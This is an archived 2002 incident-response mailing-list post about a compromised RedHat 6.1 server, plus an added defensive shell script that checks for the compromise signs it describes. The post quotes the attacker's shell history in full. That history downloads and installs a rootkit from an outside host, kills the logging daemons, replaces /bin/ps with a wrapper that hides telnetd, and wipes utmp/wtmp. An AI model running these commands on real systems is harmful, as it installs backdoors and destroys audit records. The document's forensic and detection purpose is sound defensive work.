Security Incidents mailing list archives

Sloppy compromise


From: "switched" <security-mail () q-east net>
Date: Wed, 13 Mar 2002 11:23:47 -0600

I was dealing with a compromised server (RedHat 6.1) yesterday and it was
utter crap.  After logging into the server the first thing I did was cat
/etc/passwd.  At the bottom of /etc/passwd was the user "liq2" with a uid of
0.  Not so clean.  The user "liq" had a uid of 501 I believe.  Both users
had home directories in /home... so there was a /home/liq and /home/liq2.
/home/liq contained a program, along with source, that scanned /24's for
Cisco devices.  /home/liq2 had an untampered .bash_history with this in it:

wget http://home.dal.net/[-liquid-]/login.tgz; tar zfx login.tgz; cd login;
pico rk.h; ./configure; make; make install; cd ..; rm -rf login; cd
/home/liq; rm -rf login.tar.gz; wget
ftp://ftp.wuftpd.org/pub/wu-ftpd/wu-ftpd-2.6.2.tar.gz; tar zxfv wu-ftpd-2.6.2.tar.gz; cd
wu-ftpd-2.6.2;./configure;make;make install; cd ..; rm -rf wu-ftpd-2.6.2;
rm -rf wu-ftpd-2.6.2.tar.gz; killall crond;killall syslogd;killall klogd;
mv -f /bin/ps /bin/xps; echo "xps \$*|grep -vi 'in.telnetd'|grep -vi
'grep'|sed s/'xps'/'ps'/g">/bin/ps; chown root.bin /bin/ps; chmod 0755
/bin/ps; rm -f /var/run/utmp /var/run/wtmp; touch /var/run/utmp
/var/run/wtmp; chmod 0 /var/run/utmp; chmod 0 /var/run/wtmp

Very very sloppy... But you can also see this in there...
mv -f /bin/ps /bin/xps; echo "xps \$*|grep -vi 'in.telnetd'|grep -vi
'grep'|sed s/'xps'/'ps'/g">/bin/ps

The attacker moved /bin/ps to /bin/xps and then echoed a script to ps which
removes in.telnetd from showing up and changes the name of xps to ps.  Yes,
very crappy.  You have to be 2 years old to not catch that, especially when
sed shows up in the process list every time you type "ps".  Moving right
along I soon noticed I was on pty/2 but who showed me as the only user...
interesting...  Ok, I typed xps and noticed that "./wu" was running on
pty/1! Odd...  And then I noticed the system load average jump from .2 to
2.0!  Now I noticed that "./wu" wasn't running but "./pscan" was now
running.  At this point in time I decided enough was enough and had the
machine unplugged.  Later on I went to look at it again from the console and
noticed that these IPs had connected with telnet:

212.199.3.193
212.199.12.34
212.199.173.26

They also weren't smart enough to remove or alter anything in /var/log/ and
"last" showed them logging in with ftp and telnet! DOH! Further
investigation found "wu" and "pscan" in /tmp/.or/

So has anyone else seen a compromise such as this?  From what little
investigating I did this is all I found modified... Looks like script
kiddies were at work ;).

-switched
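An added triage script, not part of the original post and not one of the tools it mentions, that checks a filesystem root for the four signs described above: a second uid-0 account in /etc/passwd, a /bin/ps that is a shell script instead of an ELF binary, utmp/wtmp emptied and set to mode 0, and dot-directories under /tmp. The sample tree it builds (the passwd entries, the fake ELF header standing in for the renamed ps, the wrapper text and the directory layout) is constructed for the example to mirror the post; on a suspect host you would run triage against "/".

```shell
#!/bin/sh
# Added triage script, not from the original post. Checks a filesystem root
# for the four signs the post describes. The sample tree built at the bottom
# is constructed for the example; run triage against "/" on a suspect host.

# 1. Accounts besides root with uid 0 (the post's "liq2" entry).
find_extra_uid0() {                 # $1 = passwd file
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# 2. A genuine ps is an ELF executable: bytes 2-4 read "ELF". The attacker's
#    replacement is a one-line shell script, so this test fails on it.
is_elf() {                          # $1 = file; true if it carries the ELF magic
    [ "$(head -c 4 "$1" | tail -c 3)" = "ELF" ]
}

ps_wrapper_check() {                # $1 = path to ps
    f=$1
    [ -e "$f" ] || { echo "MISSING: $f"; return 0; }
    if ! is_elf "$f"; then
        # Show which process name the wrapper hides, if it uses the grep -v trick.
        hidden=$(grep -o "grep -vi* '[^']*'" "$f" | head -n 1)
        echo "WRAPPER: $f is a script, not an ELF binary${hidden:+ (filters: $hidden)}"
    fi
}

# 3. utmp/wtmp emptied and chmod 0, which is why who/last show nothing.
login_log_check() {                 # $1 = utmp or wtmp path
    f=$1
    [ -e "$f" ] || { echo "MISSING: $f"; return 0; }
    perms=$(ls -ld "$f" | cut -c2-10)
    if [ "$perms" = "---------" ]; then
        echo "TAMPERED: $f has mode 0"
    elif [ -r "$f" ] && [ "$(wc -c < "$f" | tr -d ' ')" -eq 0 ]; then
        echo "TAMPERED: $f is empty"
    fi
}

# 4. Dot-directories directly under /tmp (the post's /tmp/.or/).
hidden_tmp_dirs() {                 # $1 = tmp directory
    find "$1" -mindepth 1 -maxdepth 1 -type d -name '.*'
}

# Run all checks against one root; one finding per output line.
triage() {                          # $1 = root directory ("/" on a live host)
    r=${1%/}
    find_extra_uid0 "$r/etc/passwd" | sed 's/^/UID0: /'
    ps_wrapper_check "$r/bin/ps"
    login_log_check "$r/var/run/utmp"
    login_log_check "$r/var/run/wtmp"
    hidden_tmp_dirs "$r/tmp" | sed 's/^/HIDDEN: /'
}

# --- Constructed sample tree mirroring the post (not the real host's files) ---
SAMPLE=$(mktemp -d)
trap 'rm -rf "$SAMPLE"' EXIT
mkdir -p "$SAMPLE/etc" "$SAMPLE/bin" "$SAMPLE/var/run" "$SAMPLE/tmp/.or"
cat > "$SAMPLE/etc/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
liq:x:501:501::/home/liq:/bin/bash
liq2:x:0:0::/home/liq2:/bin/bash
EOF
# Stand-in for the renamed real ps: just the ELF magic, enough for is_elf.
printf '\177ELF\002\001\001' > "$SAMPLE/bin/xps"
# The attacker's wrapper, exactly as echoed in the history above.
printf '%s\n' "xps \$*|grep -vi 'in.telnetd'|grep -vi 'grep'|sed s/'xps'/'ps'/g" > "$SAMPLE/bin/ps"
for f in utmp wtmp; do : > "$SAMPLE/var/run/$f"; chmod 0 "$SAMPLE/var/run/$f"; done

triage "$SAMPLE"
```

Against the sample tree triage prints five findings: the extra uid-0 user, the script masquerading as ps together with the name it filters, both login records at mode 0, and the hidden /tmp directory. The ELF check is the one worth remembering: a real ps never starts with printable text, so `head -c 4 /bin/ps` (or `file /bin/ps`) exposes this kind of wrapper in seconds, and the same check applies to netstat, ls, login and anything else a rootkit commonly replaces.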




----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com
